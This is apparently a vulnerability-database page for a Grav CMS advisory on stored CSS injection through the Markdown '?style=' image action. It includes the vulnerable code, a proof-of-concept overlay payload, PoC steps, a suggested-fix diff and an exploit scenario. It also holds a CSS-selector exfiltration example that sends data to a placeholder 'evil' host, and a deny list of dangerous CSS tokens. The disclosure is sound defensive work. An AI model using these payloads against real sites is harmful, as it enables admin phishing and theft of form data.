Skip to main content

Grav CMS CVE-2026-55890

| EUVDEUVD-2026-42946 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-18 https://github.com/getgrav/grav GHSA-pmf8-g7c8-7v54
4.8
CVSS 3.1 · Vendor: https://github.com/getgrav/grav
Share

Severity by source

Vendor (https://github.com/getgrav/grav) PRIMARY
4.8 MEDIUM
AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
4.8 MEDIUM

PR:H for required editor account; UI:R because a privileged admin must view the page; S:C as editor content crosses into the admin trust context; C:L/I:L for CSS exfiltration and UI manipulation without full script execution.

3.1 AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (https://github.com/getgrav/grav).

CVSS VectorVendor: https://github.com/getgrav/grav

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 18, 2026 - 16:00 vuln.today
Analysis Generated
Jun 18, 2026 - 16:00 vuln.today

DescriptionCVE.org

Summary

The fix for GHSA-r7fx-8g49-7hhr / CVE-2026-42841 (Stored XSS via Markdown media attribute() action) is incomplete. The maintainer patched MediaObjectTrait::attribute() to deny dangerous attribute names (event handlers, style, xmlns, srcdoc, formaction) but the sibling MediaObjectTrait::style() method is reachable through the same Markdown excerpt-action pipeline and writes editor-controlled strings straight into the rendered <img style="…"> attribute with no sanitization.

Any user with admin.pages permission (e.g. an editor) can save Markdown like:

markdown
![logo](image.png?style=position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999)

which renders to a stored-CSS payload that any higher-privileged viewer (administrator, super-admin, reviewer) loads in their authenticated session. Same trust boundary, same victim, same attacker, same Markdown input vector as the patched GHSA-r7fx-8g49-7hhr issue - the fix simply patched the attribute() entry point and missed the style() sibling.

Affected versions

Vulnerable at HEAD across every currently-shipping branch (verified 2026-06-15):

Branch / tagMediaObjectTrait::style()
develop (f4c0f42)unpatched
2.0 (96e1d2d)unpatched
2.0.0-rc.8 (latest 2.0 RC tag)unpatched
1.7.52 (latest 1.7 stable)unpatched

Per SECURITY.md, this advisory targets the 2.0 line (publisher-level exploit, not eligible for 1.7 backport per the project's stated policy).

Trust boundary

Per the project's SECURITY.md:

> A vulnerability is when an actor can escape the trust scope of their role: a publisher whose stored content compromises an admin session, an unauthenticated visitor who reaches a privileged sink, an account at any tier that gains capabilities it was not granted.

An editor authoring Markdown is operating within their role. A higher-privilege admin loading that editor's page in their authenticated session and getting attacker-controlled CSS painted into their browser is across the trust boundary - the same framing that was accepted for GHSA-r7fx-8g49-7hhr (MODERATE) and GHSA-c2q3-p4jr-c55f (MODERATE).

Details

Original GHSA-r7fx-8g49-7hhr fix (commit 5a12f9be8, 2026-04-23)

php
public function attribute($attribute = null, $value = '')
{
    if (empty($attribute) || !is_string($attribute)) {
        return $this;
    }
    if (!self::isSafeAttributeName($attribute)) {
        return $this;
    }
    $this->attributes[$attribute] = $value;
    return $this;
}

private static function isSafeAttributeName(string $name): bool
{
    if (!preg_match('/^[A-Za-z][A-Za-z0-9_:.\-]*$/', $name)) {
        return false;
    }
    $lower = strtolower($name);
    if (str_starts_with($lower, 'on')) {        // event handlers
        return false;
    }
    $denylist = ['style', 'xmlns', 'srcdoc', 'formaction'];
    return !in_array($lower, $denylist, true);
}

style is the second-named entry on the denylist - the maintainer explicitly recognised that editor-supplied style was dangerous when arriving via the attribute() action. The fix simply didn't reach the parallel sink.

The unpatched sibling: MediaObjectTrait::style() (line 519)

php
/**
 * Allows to add an inline style attribute from Markdown or Twig
 * Example: ![Example](myimg.png?style=float:left)
 */
public function style($style)
{
    $this->styleAttributes[] = rtrim($style, ';') . ';';
    return $this;
}

The function is unchanged before, during, and after the GHSA-r7fx-8g49-7hhr fix. The PHPDoc on the very next line names the Markdown invocation form (?style=…). The rtrim is for clean concatenation, not security.

$styleAttributes is concatenated and assigned to attributes['style'] in parsedownElement() (lines 242-251):

php
$style = '';
foreach ($this->styleAttributes as $key => $value) {
    if (is_numeric($key)) {        // editor-supplied entries are numeric-keyed
        $style .= $value;
    } else {
        $style .= $key . ': ' . $value . ';';
    }
}
if ($style) {
    $attributes['style'] = $style;
}

Parsedown then runs htmlspecialchars on the value (so quote-breakout into a new attribute is blocked), but arbitrary CSS as the value is enough.

Source → sink trace

The Markdown processor wires query-string keys to method calls on the Medium object (system/src/Grav/Common/Page/Markdown/Excerpts.php:262):

php
foreach ($actions as $action) {
    $matches = [];
    if (preg_match('/\[(.*)\]/', (string) $action['params'], $matches)) {
        $args = [explode(',', $matches[1])];
    } else {
        $args = explode(',', (string) $action['params']);
    }
    $medium = call_user_func_array([$medium, $action['method']], $args);
}

?style=position:fixed;top:0;left:0 becomes $medium->style('position:fixed;top:0;left:0').

Save-side XSS detector misses the payload

AdminController::savePage() runs Security::detectXssFromArray() on data[content] before persisting (classes/plugin/AdminController.php:1402). All five default patterns miss the Markdown form:

  • on_events: requires <…on*= in source.
  • invalid_protocols: requires javascript:/data:/etc. - the phishing-overlay payload uses none.
  • moz_binding: requires -moz-binding: literally.
  • html_inline_styles: requires <…style=…(url:|x:expression); Markdown source has no < and no url:.
  • dangerous_tags: requires <svg/<script/etc.

Save proceeds, the payload persists, the CSS is rendered to every viewer.

Impact

  • Phishing overlay - full-viewport position:fixed covering the admin UI with attacker-controlled background/content; admin clicks intended actions into the attacker's overlay.
  • UI redress / clickjacking - invisible overlays hijacking admin button clicks.
  • CSS-selector data exfiltration - input[value^="a"] { background: url(//evil/log?c=a) } against form fields the higher-privileged viewer interacts with.
  • Persistent admin-UI denial-of-service - position:fixed; background:white covers the page until the offending content is removed by hand on the server.

The stored payload reaches every user who views the editor's page - including administrators previewing pending changes.

Proof of concept

A deterministic end-to-end PoC against a real Grav install ships with the finding (repro.sh). Steps:

  1. Log in as an editor (admin.pages + admin.pages.update, no admin.super).
  2. Upload a benign image to a target page.
  3. Save the page with the Markdown payload ![alt](image?style=position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999).
  4. Visit the public page; observe the <img style="…"> carrying the unsanitised CSS.

Suggested fix

Apply the same denylist + identifier-shape gate to style() that isSafeAttributeName() enforces for attribute():

diff
 public function style($style)
 {
+    if (!is_string($style) || !self::isSafeStyleValue($style)) {
+        return $this;
+    }
     $this->styleAttributes[] = rtrim($style, ';') . ';';
     return $this;
 }

+/**
+ * Editor-controlled style values arrive via Markdown `?style=…` and reach
+ * the rendered `<img style="…">` attribute verbatim. Limit to a conservative
+ * set of CSS that themes legitimately use from content (sizing, float,
+ * margin, etc.) and reject anything that opens a phishing-overlay or
+ * data-exfil primitive. Matches the spirit of the attribute() denylist
+ * from GHSA-r7fx-8g49-7hhr - same trust boundary, sibling sink.
+ */
+private static function isSafeStyleValue(string $css): bool
+{
+    $css = strtolower($css);
+    // Deny: phishing-overlay positioning, CSS-selector exfil sinks
+    // (background/content url(...)), expression() (legacy IE),
+    // -moz-binding (legacy FF), behavior: url() (IE).
+    $deny = ['position:', '@import', 'url(', 'expression(',
+             '-moz-binding', 'behavior:', 'z-index:', 'fixed', 'absolute'];
+    foreach ($deny as $needle) {
+        if (str_contains($css, $needle)) {
+            return false;
+        }
+    }
+    return (bool) preg_match('/^[A-Za-z0-9 :;%.,\-#\/]*$/', $css);
+}

Alternatively, deprecate the Markdown ?style=… action entirely - themes can still set inline styles from PHP, but accepting attacker-controlled CSS from page content was always a footgun.

Defense in depth: extend Security::detectXss()'s html_inline_styles rule to also match Markdown-form ?style= query parameters in data[content] on save.

References

  • Original advisory: GHSA-r7fx-8g49-7hhr
  • Fix commit: 5a12f9be8 (system/src/Grav/Common/Media/Traits/MediaObjectTrait.php)
  • Unpatched code: system/src/Grav/Common/Media/Traits/MediaObjectTrait.php lines 519-524
  • Project security policy: SECURITY.md (trust-boundary severity model)

AnalysisAI

Stored CSS injection in Grav CMS's MediaObjectTrait::style() exposes an incomplete fix: the original patch for CVE-2026-42841 (GHSA-r7fx-8g49-7hhr) explicitly denylisted 'style' in the attribute() code path but left the parallel style() method-reachable via the same Markdown ?style= image query parameter pipeline-entirely unsanitized. Any editor holding admin.pages permission can save a single Markdown image reference with an arbitrary CSS payload that persists in the CMS and renders into <img style='...'> for every subsequent viewer, including administrators and super-admins in their authenticated sessions. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Editor authenticates to Grav admin panel
Delivery
Saves Markdown image with ?style= CSS payload on a target page
Exploit
AdminController XSS detector bypassed, payload persists to disk
Execution
Administrator or super-admin views the page in authenticated session
Persist
Browser renders <img> with attacker-controlled style attribute
Impact
Full-viewport CSS overlay hijacks admin UI enabling phishing, click-jacking, or data exfiltration

Vulnerability AssessmentAI

Exploitation The attacker must hold a pre-existing Grav CMS account with admin.pages and admin.pages.update permissions (the editor role); this is a non-default elevated privilege below administrator level. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The assigned CVSS 3.1 score of 4.8 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N) correctly anchors the high privilege prerequisite (editor account, PR:H) and the requirement for a privileged user to view the page (UI:R), which together bound the raw score. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An editor-level Grav account holder saves a page containing the Markdown snippet ![logo](image.png?style=position:fixed;top:0;left:0;width:100vw;height:100vh;background:white;z-index:9999); the AdminController XSS detector passes the payload without flagging it because the Markdown form contains no angle brackets, event-handler attributes, or javascript: URIs. When an administrator or super-admin subsequently views or previews that page in their authenticated browser session, the browser renders a full-viewport white overlay atop the legitimate admin UI, enabling the attacker to redirect clicks into the overlay, exfiltrate form field values via CSS selector background-url side channels, or create a persistent denial-of-service of the admin panel that persists until the offending Markdown is manually removed from the server. …
Remediation Upgrade Grav CMS to version 2.0.0-rc.9 or later, which contains the sanitization fix in system/src/Grav/Common/Media/Traits/MediaObjectTrait.php (patch commit 5a12f9be8, https://github.com/getgrav/grav/commit/5a12f9be8). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-55890 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy